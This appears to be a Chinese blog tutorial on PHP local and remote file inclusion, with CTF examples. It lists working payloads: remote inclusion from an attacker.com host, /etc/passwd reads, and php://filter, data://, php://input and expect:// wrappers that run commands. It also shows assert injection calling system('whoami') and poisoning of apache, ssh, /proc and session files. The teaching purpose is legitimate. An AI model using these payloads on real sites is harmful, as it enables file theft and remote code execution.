4 6 File Inclusion

作者: 沉云

简介

是什么

文件包含,一个简单的例子,和 c 语言 include 一样,将一个文件包含到另一个文件。通常出现在多文件开发,模块化开发的场景下。

文件包含,就是代码中通过某种方法包含了其它文件,可以将另一个文件的内容引入到当前文件。从而可以执行代码。

最终的危害就是包含由们可以控制的内容文件,从而执行代码。

 本地文件包含
http://example.com/index.php?page=/etc/passwd

 远程文件包含
http://example.com/index.php?page=http://atacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php

根据包含文件的位置,文件包含分为 LFI / RFI 本地文件包含/远程文件包含。

实际中的限制

虽然能包含文件,通常只能包含某个固定范围的文件。

即使能随便包含,通常也找不到存在恶意代码的文件。

远程包含一般是默认禁用,或者代码不支持。

攻击

  1. 探测参数入口点。一般而言,参数名、值都比较明显,page= 或 file= 等等。这块可以根据经验进行判断。

  2. 绕过代码过滤。常见的绕过方式,见下文。

    以下字典包含了常见的绕过 payload : windows linux

  3. 利用。最终执行代码。

    代码防御绕过

    绕过原理

某些是利用系统、编程语言、中间件的特性。例如在某些场景下:

 /etc/passwd = /etc//passwd = /etc/./passwd = /etc/passwd/ = /etc/passwd/.

常见的绕过方式分为以下几种:

php 提供的协议封装流,可以将很多东西视为文件。可以扩大文件包含的利用面。关于 php 支持的 wapper 详情见 官方手册

php 中包含函数 require, require_once, include, include_once

php 中与之相关的参数有 allow_url_fopen allow_url_include 分别决定能否使用协议封装流,能否在包含函数处使用。

phpinfo 中的信息

image-20210517145203722

image-20210517145211295

 用于读取敏感文件

 可以以编码的形式读取文件,防止乱码,或读取二进制文件
php://filter/read=string.rot13/resource=index.php
php://filter/convert.base64-encode/resource=index.php

 读取并使用zlib 压缩
php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
 解码 readfile('php://filter/zlib.inflate/resource=test.deflated');

 用于提供 php 恶意代码,结合文件包含 getshell

 data 协议直接包含 php 代码
data://text/plain,<?php phpinfo(); ?>

 和data协议类似
http://example.com/index.php?page=php://input
post 提交数据 <?php phpinfo(); ?>

 except 协议直接执行系统命令
http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls

 phar 可以包含php 代码,或在反序列化处使用。

assert

assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");



' and die(show_source('/etc/passwd')) or '
' and die(system("whoami")) or '


assert("strpos('' and die(system("whoami")) or '', '..') === false") or die("Detected hacking attempt!");

apache 、ssh log

触发log,然后包含。不一定能有权限访问日志

 apache /var/log/apache2/access.log
通过请求 url 中携带 php 代码触发

 ssh    /var/log/auth.log
通过请求触发  ssh -l "<?php phpinfo(); ?>" ip

/proc/self/*

  • /proc/self/environ

    包含一些运行时的环境变量,例如 REMOTE_PORTHTTP_USER_AGENT 等等。

    可以尝试在修改数据包中 user-agent 等信息,添加恶意代码,然后包含这个文件。

    在某些高系统版本中,该文件不能被非 root 用户访问

  • /proc/self/fd/*

    包含该进程打开的文件描述符。当有上传文件、或者将session 保存到文件中,就可以用到这个。

    phpsession

phpsession 通常存放在文件中。

 通常存放位置
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
当看到响应包中有Set-Cookie 设置 PHPSESSID,则可以尝试。

结合文件上传

上传 zip,phar ,包含php 代码的图片、文本文件等等,可以与文件包含联合起来。

ctf 中

  1. ciscn_2021 middle_source

    页面包含一个文件包含漏洞,并且成功包含 phpinfo 文件。allow_url_include 开关关闭,无效远程包含。

    尝试包含 log、 proc 目录下文件、session 都失效了。仔细看 phpinfo ,发现 session.upload_progress.enabled 开关是开启的。并且 session 保存路径是可访问到的。

    则构造出 session.upload_progress.enabled 产生场景,并包含 session 文件。

    由于这个 session 是在上传时记录上传过程,那就构造上传请求,并添加这个 session 。并且这个 session 存活时间较短,所以也需要条件竞争。

    详见 https://blog.csdn.net/m0_51078229/article/details/114440061。

  2. [HCTF 2018]WarmUp

    题目要求必须以特定文件开头,故 exp 为 /source.php?file=source.php?/../../../../ffffllllaaaagggg

    其原理是将 source.php? 视为一个文件,从而目录穿越。虽然这个目录是不存在的,但依然可以。

    在 linux PHP 7.4.15 下,这样是可以,但在 windows php 5.4.45 / 7.2.1 版本下都失败了

    aaa
    

    zzz.php
    

    Warning: include(): Failed opening 'asd?/../aaa' for inclusion

原文创作:沉云

原文链接:https://www.cnblogs.com/starrys/p/14660346.html

更多推荐

更多
这里什么都没有

近期文章

更多
文章目录

    推荐作者

    更多